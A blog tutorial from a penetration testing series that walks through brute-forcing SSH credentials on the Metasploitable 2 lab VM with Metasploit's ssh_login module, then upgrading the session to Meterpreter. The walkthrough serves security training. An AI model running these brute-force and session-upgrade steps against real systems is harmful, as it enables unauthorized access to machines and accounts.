Penetration Testing Series: Hacking Metasploitable 2 By Exploiting SSH Port 22

Introduction
This article continues my penetration testing series, exploring hacking Metasploitable 2. In this project, we delve into penetration testing by exploring the process of exploiting SSH Port 22 on the renowned vulnerable virtual machine, Metasploitable 2.
By targeting Metasploitable 2’s vulnerable SSH service, we aim to provide an in-depth understanding of the techniques employed by ethical hackers and penetration testers to exploit and gain unauthorized access to systems.
SSH (Secure Shell) is a widely used network protocol for secure remote login and file transfer. It provides encrypted communication between a client and a server over a computer network. While SSH is a secure protocol, attackers can still target it if not correctly configured. This article will focus on exploiting Port 22, the default port SSH servers used for communication.
Throughout this exploration, we will utilize the Metasploit Framework to illustrate how to take advantage of the vulnerabilities in the SSH service on Metasploitable 2 by employing commonly available modules and payloads. With this approach, we can access the target system without authorization.
It is important to emphasize that this article’s intent is solely educational and aimed at empowering security professionals and enthusiasts with knowledge on how to identify and secure their systems against potential threats. Understanding the tactics used by malicious actors is critical in developing robust defense mechanisms and implementing effective security measures.
Disclaimer:
All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.
Lab Setup
- VirtualBox
- Kali Linux Virtual Machine (VM)
- Metasploitable 2 VM
Part 1: Reconnaissance
To begin, confirm the information about the target system. Follow these steps:
- Use the ifconfig command to get the IP address of the Metasploitable 2 VM: 10.60.0.18.
ifconfig

2. To access the Nmap scan file from the previous article on https://readmedium.com/penetration-testing-series-hacking-metasploitable-2-via-exploiting-ftp-port-21-4d90718d0897, enter the command “cat META2.txt” in the terminal.
cat META2.txtOur target system is running OpenSSH 4.7p1 Debian on port 22.

Part 2: Metasploit
Follow these steps to utilize Metasploit to gain access to the target system:
- Type “msfconsole” to launch the Metasploit Framework command-line interface.
msfconsole

2. Use the “search” command followed by the “ssh_login” to search for information within the Metasploit Framework related to the SSH login.
search ssh_loginWe received back two exploits.
3. Type “use 0” to select and use the first exploit.

4. Type “show options” to view the required parameters that need to be set for the exploit.
show options5. Fill in the required parameters, such as setting the RHOSTS (Remote Hosts) to the IP address of the target system (10.60.0.18), setting the USER_FILE to the Users.txt, and the PASS_FILE to the Passwords.txt.
The wordlists, Users.txt and Passwords.txt, were generated from the previous article in the penetration testing series, as mentioned in https://readmedium.com/penetration-testing-series-hacking-metasploitable-2-via-exploiting-ftp-port-21-4d90718d0897.
set RHOSTS 10.60.0.18set USER_FILE Users.txtset PASS_FILE Passwords.txt
6. Type “show options.”
7. We need to update the value of STOP_ON_SUCCESS from false to true so that once we successfully find a valid username and password, the brute force scanner stops.

8. Type the following “set” command to change the value of STOP_ON_SUCCESS from false to true.
set STOP_ON_SUCCESS true
9. Again, Type “show options” to confirm that you correctly set the RHOSTS, USER_FILE, PASS_FILE, and STOP_ON_SUCCESS.

10. Type “exploit” to execute the exploitation and gain access to the Metasploitable 2 machine via SSH Port 22.
exploit
We successfully used brute force to obtain the username and password “msfadmin,” as a result, we could establish an SSH session 2 to interact with it.
11. Type “sessions” to view the active sessions.
sessions


12. We are going to use session 1 by typing the following command:
sessions -u 1
Meterpreter session 3 opened.

13. Type “sessions 3”.
sessions 3
14. Type the “sysinfo” and “ifconfig” commands to interact with the Metasploitable 2 machine.
sysinfo
ifconfig

We were able to hack Metasploitable 2 by exploiting SSH through Port 22.
To exit the meterpreter session and Metasploit, type the following commands:
exitexit -y
Conclusion
I appreciate you taking the time to read this article. Hopefully, the information presented has been helpful and valuable to you.
I aim to reach a wider audience and enlighten them about the potential risks of cyber-attacks, various types of penetration testing tools, and everything related to information technology.
If you would like to access more articles, please follow me.
Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!
The Gray Area is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out this form! To get updates whenever The Gray Area publishes an article, check out our Twitter page, @TGAonMedium.





